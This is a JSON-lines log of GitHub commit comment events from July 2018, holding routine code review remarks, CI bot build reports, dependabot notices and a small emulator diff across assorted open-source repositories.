{"id":"8039238179","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891094,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:45:06Z","updated_at":"2018-07-30T17:45:06Z","author_association":"CONTRIBUTOR","body":"Your comment came in while I was writing mine, so I just saw it now.\r\n\r\nProbably none of the other clients would use the `test_dicom_data` keyword argument, right? I.e., this would be added just for the filesystem client"}},"created_at":"2018-07-30T17:45:06Z"}
{"id":"8039241005","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29891100,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-30T17:45:36Z","updated_at":"2018-07-30T17:45:36Z","author_association":"COLLABORATOR","body":"This seems to have caused issue https://github.com/magnumripper/JohnTheRipper/issues/3336."}},"created_at":"2018-07-30T17:45:36Z"}
{"id":"8039241795","type":"CommitCommentEvent","actor":{"login":"KOREAN139"},"repo":{"name":"KOREAN139/clox"},"payload":{"comment":{"id":29891102,"position":76,"line":83,"path":"memory.c","commit_id":"40b3b2216feee54da401dc4dc706de833d5813bb","created_at":"2018-07-30T17:45:45Z","updated_at":"2018-07-30T17:45:45Z","author_association":"OWNER","body":"When external fragmentation occurs"}},"created_at":"2018-07-30T17:45:45Z"}
{"id":"8039242772","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29891104,"position":null,"line":null,"path":null,"commit_id":"7571a5c1f2ebfe4d7c39098a448ba7274ab3ca61","created_at":"2018-07-30T17:45:57Z","updated_at":"2018-07-30T17:45:57Z","author_association":"CONTRIBUTOR","body":"Okay, thank you for clarifying. :+1:\n\nAs there was no explicit mention of the Faerie Fire code change in the commit description, I thought it was some lingering change from TBC that was forgotten when backporting. \n\n"}},"created_at":"2018-07-30T17:45:57Z"}
{"id":"8039243332","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29891107,"position":null,"line":null,"path":null,"commit_id":"ed0296ce9f0b5bdf4956c5b07a41890161956987","created_at":"2018-07-30T17:46:04Z","updated_at":"2018-07-30T17:46:04Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2951 of 2953 tests passed, 0 test warnings)\n\nMessages:\n\n * 2 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T17:46:04Z"}
{"id":"8039245598","type":"CommitCommentEvent","actor":{"login":"gjavolce"},"repo":{"name":"gjavolce/codility"},"payload":{"comment":{"id":29891113,"position":null,"line":null,"path":null,"commit_id":"9d32071cbd2de4e4279d1185a27b29d04a684de6","created_at":"2018-07-30T17:46:29Z","updated_at":"2018-07-30T17:46:29Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-30T17:46:29Z"}
{"id":"8039245617","type":"CommitCommentEvent","actor":{"login":"InuSasha"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":29891112,"position":5,"line":316,"path":"scripts/create_addon","commit_id":"1cdead36238b57b36171fe085900a307dba49376","created_at":"2018-07-30T17:46:29Z","updated_at":"2018-07-30T17:46:29Z","author_association":"CONTRIBUTOR","body":"I thought about it, too.\r\nThe actual solution may a bit faster, but not tested.\r\n"}},"created_at":"2018-07-30T17:46:29Z"}
{"id":"8039246831","type":"CommitCommentEvent","actor":{"login":"angad128"},"repo":{"name":"angad128/djangoTutorial"},"payload":{"comment":{"id":29891116,"position":null,"line":null,"path":null,"commit_id":"18f74d5149f8792f9539aafe31aea3ce3396b742","created_at":"2018-07-30T17:46:44Z","updated_at":"2018-07-30T17:46:44Z","author_association":"OWNER","body":"first myWebsite app called musicApp is create with :- \"\"python manage.py startapp musicApp\"\r\n"}},"created_at":"2018-07-30T17:46:44Z"}
{"id":"8039248871","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29891120,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-30T17:47:07Z","updated_at":"2018-07-30T17:47:07Z","author_association":"COLLABORATOR","body":"CC @claudioandre-br. Hey, can you spot a problem with this change?"}},"created_at":"2018-07-30T17:47:07Z"}
{"id":"8039258171","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29891148,"position":null,"line":null,"path":null,"commit_id":"da0ad2cace61512fe1b1bdfd8e498e2373ab2192","created_at":"2018-07-30T17:48:54Z","updated_at":"2018-07-30T17:48:54Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/da0ad2cace61512fe1b1bdfd8e498e2373ab2192/index.html"}},"created_at":"2018-07-30T17:48:54Z"}
{"id":"8039258673","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29891150,"position":null,"line":null,"path":null,"commit_id":"7571a5c1f2ebfe4d7c39098a448ba7274ab3ca61","created_at":"2018-07-30T17:49:00Z","updated_at":"2018-07-30T17:49:00Z","author_association":"CONTRIBUTOR","body":"Yeah, that is indeed true, I do notice a lot of these ancient code snippets that are no longer valid when porting up and down."}},"created_at":"2018-07-30T17:49:00Z"}
{"id":"8039259676","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29891152,"position":null,"line":null,"path":null,"commit_id":"97cec0e4b84c2692c32a8d08c5ed247dadf2a447","created_at":"2018-07-30T17:49:11Z","updated_at":"2018-07-30T17:49:11Z","author_association":"COLLABORATOR","body":"@smiths Is the format of defaultLoadASTM.txt correct? I think I understand it correctly from the MIS"}},"created_at":"2018-07-30T17:49:11Z"}
{"id":"8039260709","type":"CommitCommentEvent","actor":{"login":"jamesderr7173"},"repo":{"name":"submit50/USERNAME"},"payload":{"comment":{"id":29891153,"position":null,"line":null,"path":null,"commit_id":"d429888ce6bd4386e4b03470db7b459f8662c938","created_at":"2018-07-30T17:49:22Z","updated_at":"2018-07-30T17:49:22Z","author_association":"NONE","body":"Trying to contact to someone that can help me.  I am a student in the cs50 class & am having a problem.  I could submit my hello.c file, but can't submit my hello (executable file). I have performed the check50, style50 & help50; all come out fine.  But the system will not permit me to upload the hello with hello.c."}},"created_at":"2018-07-30T17:49:22Z"}
{"id":"8039262997","type":"CommitCommentEvent","actor":{"login":"karawoo"},"repo":{"name":"ropensci/jsonvalidate"},"payload":{"comment":{"id":29891160,"position":null,"line":null,"path":null,"commit_id":"d831da511f7de69383948981ac6156c110865ce9","created_at":"2018-07-30T17:49:48Z","updated_at":"2018-07-30T17:49:48Z","author_association":"NONE","body":"Yeah I saw that after I accidentally added these duplicated versions of the tests to my branch"}},"created_at":"2018-07-30T17:49:48Z"}
{"id":"8039265086","type":"CommitCommentEvent","actor":{"login":"Ronnie-Skylar"},"repo":{"name":"Ronnie-Skylar/aarons_repo"},"payload":{"comment":{"id":29891163,"position":null,"line":null,"path":null,"commit_id":"ec6b922fb63d652aad4a301afca8378c98c02dd0","created_at":"2018-07-30T17:50:13Z","updated_at":"2018-07-30T17:50:13Z","author_association":"OWNER","body":"God that took you a while."}},"created_at":"2018-07-30T17:50:13Z"}
{"id":"8039265691","type":"CommitCommentEvent","actor":{"login":"hiddenruby"},"repo":{"name":"hiddenruby/pokerubyhack"},"payload":{"comment":{"id":29891166,"position":null,"line":null,"path":null,"commit_id":"b3ac617a90a4f4b318365967b319e94cfb961a1f","created_at":"2018-07-30T17:50:20Z","updated_at":"2018-07-30T17:50:20Z","author_association":"OWNER","body":"- Initial .gitignore additions\r\n- Initial README change from pokeruby's\r\n- Build ruby 1.2 by default, use ruby_rev0 to make 1.0\r\n- Remove checksum comparison and associated files\r\n- Initial output file name change from pokeruby's\r\n- Remove tile number check from graphics"}},"created_at":"2018-07-30T17:50:20Z"}
{"id":"8039266231","type":"CommitCommentEvent","actor":{"login":"dillonwilliams"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891167,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T17:50:26Z","updated_at":"2018-07-30T17:50:26Z","author_association":"CONTRIBUTOR","body":"I think it's important to have everything the class needs to run in its constructor; otherwise you have to construct the object and then `object.initialize(otherstuff)`. However most of the arguments sent to the filesystem client constructor (related to the PACS) are just logged and thrown away.\r\n\r\nCorrect, `test_dicom_data` is filesystem client only. `dcmtk` or other libraries would just use the PACS. "}},"created_at":"2018-07-30T17:50:26Z"}
{"id":"8039273940","type":"CommitCommentEvent","actor":{"login":"birchmd"},"repo":{"name":"ys-pyrofex/rchain"},"payload":{"comment":{"id":29891177,"position":null,"line":null,"path":null,"commit_id":"feb0587bd8bf8080aaac8e156fadfb5d81544ea2","created_at":"2018-07-30T17:51:53Z","updated_at":"2018-07-30T17:51:53Z","author_association":"NONE","body":"We could replace the platform-dependent shell commands for deleting/moving files with Java methods instead. This makes up the majority of the diff. Then it would just be a matter of using `jflex.bat` instead of `jflex`, which perhaps can be automatically detected."}},"created_at":"2018-07-30T17:51:53Z"}
{"id":"8039274470","type":"CommitCommentEvent","actor":{"login":"mshriver"},"repo":{"name":"ManageIQ/integration_tests"},"payload":{"comment":{"id":29891178,"position":null,"line":null,"path":null,"commit_id":"deba336e5c96031f0532adf6a4287210ebc49d0d","created_at":"2018-07-30T17:51:58Z","updated_at":"2018-07-30T17:51:58Z","author_association":"MEMBER","body":"nice, thanks!!"}},"created_at":"2018-07-30T17:51:58Z"}
{"id":"8039281251","type":"CommitCommentEvent","actor":{"login":"gsfvsklvm"},"repo":{"name":"gsfvsklvm/jrep"},"payload":{"comment":{"id":29891198,"position":null,"line":null,"path":null,"commit_id":"58e39ea34b57f2d152990ea7a73b160b877eba61","created_at":"2018-07-30T17:53:14Z","updated_at":"2018-07-30T17:53:14Z","author_association":"OWNER","body":",nkjn"}},"created_at":"2018-07-30T17:53:14Z"}
{"id":"8039281761","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29891201,"position":5,"line":8,"path":"CaseStudies/glass/src/Python/NewImplementation/SeqServices.py","commit_id":"97cec0e4b84c2692c32a8d08c5ed247dadf2a447","created_at":"2018-07-30T17:53:20Z","updated_at":"2018-07-30T17:53:20Z","author_association":"COLLABORATOR","body":"This was an erroneous change reverted in 030ceaf"}},"created_at":"2018-07-30T17:53:20Z"}
{"id":"8039281945","type":"CommitCommentEvent","actor":{"login":"joearasin"},"repo":{"name":"RagtagOpen/nomad"},"payload":{"comment":{"id":29891202,"position":11,"line":116,"path":"tests/conftest.py","commit_id":"6b8e6f7c7450ecfcc1efbc20e4e8260e29925f7e","created_at":"2018-07-30T17:53:22Z","updated_at":"2018-07-30T17:53:22Z","author_association":"CONTRIBUTOR","body":"I think it makes sense to put this in the factory, at least for the default carpool. \"Time in the future\" was what I intended there. [now, and now+2 hours] is probably not sufficiently futuristic.\r\n\r\nAlso, I think these can be specified as arguments to carpool factory:\r\n\r\n```python\r\ncarpool = CarpoolFactory(leave_time=datetime.now+timedelta(days=1), return_time=datetime.now+timedelta(days=3))\r\n```"}},"created_at":"2018-07-30T17:53:22Z"}
{"id":"8039285532","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29891212,"position":35,"line":35,"path":"CaseStudies/glass/src/Python/NewImplementation/LoadASTM.py","commit_id":"97cec0e4b84c2692c32a8d08c5ed247dadf2a447","created_at":"2018-07-30T17:54:03Z","updated_at":"2018-07-30T17:54:03Z","author_association":"COLLABORATOR","body":"`print` statements for testing removed in 030ceaf"}},"created_at":"2018-07-30T17:54:03Z"}
{"id":"8039287011","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29891219,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T17:54:19Z","updated_at":"2018-07-30T17:54:19Z","author_association":"MEMBER","body":"Interesting, can you share a diff patch?"}},"created_at":"2018-07-30T17:54:19Z"}
{"id":"8039290612","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"igorkamyshev/react-timeline-scribble"},"payload":{"comment":{"id":29891223,"position":null,"line":null,"path":null,"commit_id":"1260e730046248fa71ddce42c06f3db32f6d7c67","created_at":"2018-07-30T17:54:59Z","updated_at":"2018-07-30T17:54:59Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #7 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-30T17:54:59Z"}
{"id":"8039291790","type":"CommitCommentEvent","actor":{"login":"joearasin"},"repo":{"name":"RagtagOpen/nomad"},"payload":{"comment":{"id":29891226,"position":9,"line":41,"path":"tests/functional/test_carpool.py","commit_id":"6b8e6f7c7450ecfcc1efbc20e4e8260e29925f7e","created_at":"2018-07-30T17:55:13Z","updated_at":"2018-07-30T17:55:13Z","author_association":"CONTRIBUTOR","body":"Is there a python equivalent of ruby's timecop? I think on an integration test, actually simulating winding the clock would be great."}},"created_at":"2018-07-30T17:55:13Z"}
{"id":"8039295597","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29891230,"position":4,"line":4,"path":"src/components/settingsNavigation/importContacts.vue","commit_id":"1200e6cb0b48f61095c80e9c7b9e1394185ed48c","created_at":"2018-07-30T17:55:54Z","updated_at":"2018-07-30T17:55:54Z","author_association":"COLLABORATOR","body":"Don't put me on copyright on files I did not contributed to! :)"}},"created_at":"2018-07-30T17:55:54Z"}
{"id":"8039296263","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29891233,"position":null,"line":null,"path":null,"commit_id":"f079c85defe516954547d0eddd89fd32926fabc8","created_at":"2018-07-30T17:56:01Z","updated_at":"2018-07-30T17:56:01Z","author_association":"CONTRIBUTOR","body":"@MajkiIT fyi"}},"created_at":"2018-07-30T17:56:01Z"}
{"id":"8039297343","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"igorkamyshev/react-timeline-scribble"},"payload":{"comment":{"id":29891236,"position":null,"line":null,"path":null,"commit_id":"8326fae01aa79b5ce44d0a34ebffe7a3ccc81681","created_at":"2018-07-30T17:56:13Z","updated_at":"2018-07-30T17:56:13Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #8 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-30T17:56:13Z"}
{"id":"8039298218","type":"CommitCommentEvent","actor":{"login":"EvzenP"},"repo":{"name":"sdl/Sdl-Community"},"payload":{"comment":{"id":29891239,"position":6,"line":43,"path":"Report Exporter/Sdl.Community.ReportExporter/Helpers/Help.cs","commit_id":"bc614249ccb2658c461fb37fafaf40a89c1800d3","created_at":"2018-07-30T17:56:23Z","updated_at":"2018-07-30T17:56:23Z","author_association":"NONE","body":"Hardcoding \"My Documents\" here is incorrect. The `projects.xml` file can be located elsewhere, not only in \"My Documents\".\r\nIts actual location is stored in a XML file in `%AppData%\\SDL\\ProjectApi\\<Studio_Version>\\Sdl.ProjectApi.xml` in `LocalProjectServerInfo` element.\r\n\r\nUsage of such hardoced location should be fixed **everywhere** in **all sources**."}},"created_at":"2018-07-30T17:56:23Z"}
{"id":"8039298943","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"igorkamyshev/react-timeline-scribble"},"payload":{"comment":{"id":29891240,"position":null,"line":null,"path":null,"commit_id":"eaf86ed71e5716579d98dde55043ba1b465f0cda","created_at":"2018-07-30T17:56:30Z","updated_at":"2018-07-30T17:56:30Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #10 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-30T17:56:30Z"}
{"id":"8039300016","type":"CommitCommentEvent","actor":{"login":"dependabot[bot]"},"repo":{"name":"igorkamyshev/react-timeline-scribble"},"payload":{"comment":{"id":29891243,"position":null,"line":null,"path":null,"commit_id":"da19c5bd8f9d8da9c31642929dc5f05d589c4d75","created_at":"2018-07-30T17:56:42Z","updated_at":"2018-07-30T17:56:42Z","author_association":"NONE","body":"Looks like there have been some additional commits to the head branch since #9 was first opened. I'll rebase it for you to ensure it's running the latest tests. (It'll take me a couple of minutes.)"}},"created_at":"2018-07-30T17:56:42Z"}
{"id":"8039300813","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891248,"position":4,"line":4,"path":"Part_5/train_cargo.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T17:56:51Z","updated_at":"2018-07-30T17:56:51Z","author_association":"NONE","body":"такие моменты:\r\n- эта переменная общая для подклассов\r\n- не очень правильно, что в родителе есть геттер для этой переменной, а сама переменная не инициализируется\r\n\r\nлушче переменную инициализировать в родителе, а здесь ее вместе с номером туда передавать\r\n"}},"created_at":"2018-07-30T17:56:51Z"}
{"id":"8039301546","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29891251,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-30T17:56:59Z","updated_at":"2018-07-30T17:56:59Z","author_association":"COLLABORATOR","body":"Hmm. Seems like an off-by-one buffer write problem."}},"created_at":"2018-07-30T17:56:59Z"}
{"id":"8039302988","type":"CommitCommentEvent","actor":{"login":"MajkiIT"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29891254,"position":null,"line":null,"path":null,"commit_id":"f079c85defe516954547d0eddd89fd32926fabc8","created_at":"2018-07-30T17:57:14Z","updated_at":"2018-07-30T17:57:14Z","author_association":"NONE","body":"@okiehsch Thanks a lot. "}},"created_at":"2018-07-30T17:57:14Z"}
{"id":"8039303043","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29891255,"position":null,"line":null,"path":null,"commit_id":"377785e6b9a5142ac8b4ad6e33c55862dad1c9c9","created_at":"2018-07-30T17:57:15Z","updated_at":"2018-07-30T17:57:15Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (lgu1234) - x86_64-MacOS-10.9-clang: OK (2952 of 2953 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 657\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-377785e6b9a5142ac8b4ad6e33c55862dad1c9c9-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T17:57:15Z"}
{"id":"8039303403","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891257,"position":4,"line":4,"path":"Part_5/train_cargo.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T17:57:19Z","updated_at":"2018-07-30T17:57:19Z","author_association":"NONE","body":"для справки\r\nпро вызов `super` :\r\n- `super` - отправит все аргументы пришедшие в текущий метод\r\n- `super()` - вызовет родительский метод без аргументов\r\n- `super(x, y, z)` - отправит все указанные аргументы"}},"created_at":"2018-07-30T17:57:19Z"}
{"id":"8039304218","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29891261,"position":21,"line":60,"path":"src/components/settingsNavigation/sortContacts.vue","commit_id":"2d90c0ebe68d0ace7e657d5498724ddbad177831","created_at":"2018-07-30T17:57:28Z","updated_at":"2018-07-30T17:57:28Z","author_association":"COLLABORATOR","body":"Don't forget the translations ;)"}},"created_at":"2018-07-30T17:57:28Z"}
{"id":"8039305116","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29891262,"position":null,"line":null,"path":null,"commit_id":"aabff639a9b326af16a10ebe1b8766891e69c2d7","created_at":"2018-07-30T17:57:37Z","updated_at":"2018-07-30T17:57:37Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-299](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-299).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-299-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T17:57:37Z"}
{"id":"8039309468","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":29891284,"position":33,"line":234,"path":"scripts/pipeline/compara_db_config.rng","commit_id":"b6501b6b8674f5ba5df36949346c8d712685d203","created_at":"2018-07-30T17:58:24Z","updated_at":"2018-07-30T17:58:24Z","author_association":"MEMBER","body":"OK. I've pushed a slightly different version then. I've made the whole `<gene_trees>` section optional (just like all the other sections at that same level) instead of just `<nc_trees>`. I don't think we should enforce that `<protein_trees>` must exist. For instance, the _bacteria_ compara database only has protein-families and no trees"}},"created_at":"2018-07-30T17:58:24Z"}
{"id":"8039309820","type":"CommitCommentEvent","actor":{"login":"joearasin"},"repo":{"name":"RagtagOpen/nomad"},"payload":{"comment":{"id":29891285,"position":9,"line":41,"path":"tests/functional/test_carpool.py","commit_id":"6b8e6f7c7450ecfcc1efbc20e4e8260e29925f7e","created_at":"2018-07-30T17:58:27Z","updated_at":"2018-07-30T17:58:27Z","author_association":"CONTRIBUTOR","body":"Looks like [freezegun](http://stevepulec.com/freezegun/) will do it."}},"created_at":"2018-07-30T17:58:27Z"}
{"id":"8039317869","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29891308,"position":14,"line":34,"path":"src/components/settingsNavigation/sortContacts.vue","commit_id":"2d90c0ebe68d0ace7e657d5498724ddbad177831","created_at":"2018-07-30T17:59:57Z","updated_at":"2018-07-30T17:59:57Z","author_association":"COLLABORATOR","body":"You should not need the `(value)`\nYou can directly use the this.value variable in the function! :)\n\nAlso maybe use a better variable name? "}},"created_at":"2018-07-30T17:59:57Z"}
{"id":"8039318084","type":"CommitCommentEvent","actor":{"login":"jiru"},"repo":{"name":"Tatoeba/tatoeba2"},"payload":{"comment":{"id":29891310,"position":4,"line":31,"path":"app/View/Helper/LicenseHelper.php","commit_id":"a9c01ac3e45208ef2248caffa298d60d92391f25","created_at":"2018-07-30T17:59:59Z","updated_at":"2018-07-30T17:59:59Z","author_association":"MEMBER","body":"Good job about fixing `zend.assertions`. I fixed the problem too, the assertion shouldn’t fail any more.\r\n\r\nYes, I made it so that the License helper should never be called directly but only from within the Audio or Sentences helper, or basically any helper that defines which licenses should be available, using the `availableLicences` configuration key."}},"created_at":"2018-07-30T17:59:59Z"}
{"id":"8039319129","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891315,"position":1,"line":1,"path":"Part_5/car_cargo.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:00:12Z","updated_at":"2018-07-30T18:00:12Z","author_association":"NONE","body":"здесь и в остальных классах-наследниках нужно поправить названия фалов\r\nклассы названы верно, в соответсвии с этими названиями нужно и файлы назвать\r\nнапример этот файл нуно назвать `cargo_car.rb`"}},"created_at":"2018-07-30T18:00:12Z"}
{"id":"8039320566","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891321,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T18:00:25Z","updated_at":"2018-07-30T18:00:25Z","author_association":"CONTRIBUTOR","body":"I completely agree with: \r\n\r\n> I think it's important to have everything the class needs to run in its constructor\r\n\r\nI think `object.initialize(otherstuff)`  would be really bad.\r\n\r\nWhat I am thinking is something like this:\r\n\r\n```\r\ndef init_test_filesystem_client():\r\n    return FilesystemClient( hardcoded args )\r\n\r\ndef init_test_other_client():\r\n    return OtherClient( hardcoded and different test args )\r\n```\r\n\r\ntest_client_initializers = [init_test_filesystem_client, init_test_other_client\r\n\r\n# use this to parameterize test fixtures ^^ \r\n```"}},"created_at":"2018-07-30T18:00:25Z"}
{"id":"8039322232","type":"CommitCommentEvent","actor":{"login":"monishakadappu1"},"repo":{"name":"monishakadappu1/myfirstrepo"},"payload":{"comment":{"id":29891326,"position":null,"line":null,"path":null,"commit_id":"956723d6e5cf9cdc3bf1902d2f2dd0e6c27e7e78","created_at":"2018-07-30T18:00:43Z","updated_at":"2018-07-30T18:00:43Z","author_association":"OWNER","body":"intro to robot framework"}},"created_at":"2018-07-30T18:00:43Z"}
{"id":"8039324246","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29891327,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T18:01:07Z","updated_at":"2018-07-30T18:01:07Z","author_association":"NONE","body":"```\r\ndiff --git a/core/hw/aica/sgc_if.cpp b/core/hw/aica/sgc_if.cpp\r\nindex 2e69cb1..370fbcc 100755\r\n--- a/core/hw/aica/sgc_if.cpp\r\n+++ b/core/hw/aica/sgc_if.cpp\r\n@@ -431,33 +431,6 @@ struct ChannelEx\r\n                        clip_verify(sample*oRight>=0);\r\n                        clip_verify(sample*oDsp>=0);\r\n \r\n-                       if (settings.aica.EGHack)\r\n-                       {\r\n-                               if ((s64)(this->ccd->DL + mixl + mixr + *VolMix.DSPOut) == 0)\r\n-                               {\r\n-                                       switch(this->AEG.state)\r\n-                                       {\r\n-                                       case EG_Decay1:\r\n-                                               if(this->AEG.AttackRate > this->AEG.Decay1Rate)\r\n-                                               {\r\n-                                                       //printf(\"Promote 1\\n\");\r\n-                                                       this->SetAegState(EG_Attack);\r\n-                                               }\r\n-\r\n-                                               break;\r\n-\r\n-                                       case EG_Decay2:\r\n-                                               if(this->AEG.AttackRate > this->AEG.Decay2Rate)\r\n-                                               {\r\n-                                                       //printf(\"Promote 2\\n\");\r\n-                                                       this->SetAegState(EG_Attack);\r\n-                                               }\r\n-\r\n-                                               break;\r\n-                                       }\r\n-                               }\r\n-                       }\r\n-\r\n                        StepAEG(this);\r\n                        StepFEG(this);\r\n                        StepStream(this);\r\n@@ -723,6 +696,7 @@ struct ChannelEx\r\n                case 0x18://FNS\r\n                case 0x19://FNS,OCT\r\n                        UpdatePitch();\r\n+                       UpdateAEG();\r\n                        break;\r\n \r\n                case 0x1C://ALFOS,ALFOWS,PLFOS\r\n```"}},"created_at":"2018-07-30T18:01:07Z"}
{"id":"8039325073","type":"CommitCommentEvent","actor":{"login":"johndgiese"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891329,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T18:01:15Z","updated_at":"2018-07-30T18:01:15Z","author_association":"CONTRIBUTOR","body":"I think this approach would let us avoid having arguments that are only used for certain clients, but not others, which doesn't feel great to me."}},"created_at":"2018-07-30T18:01:15Z"}
{"id":"8039328193","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891333,"position":3,"line":3,"path":"Part_5/car_cargo.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:01:48Z","updated_at":"2018-07-30T18:01:48Z","author_association":"NONE","body":"эту переменную лучше инициализировать в родителе, а из \"инишиалайзов\" наследников правильно вызывать \"супер\" родителя\r\n"}},"created_at":"2018-07-30T18:01:48Z"}
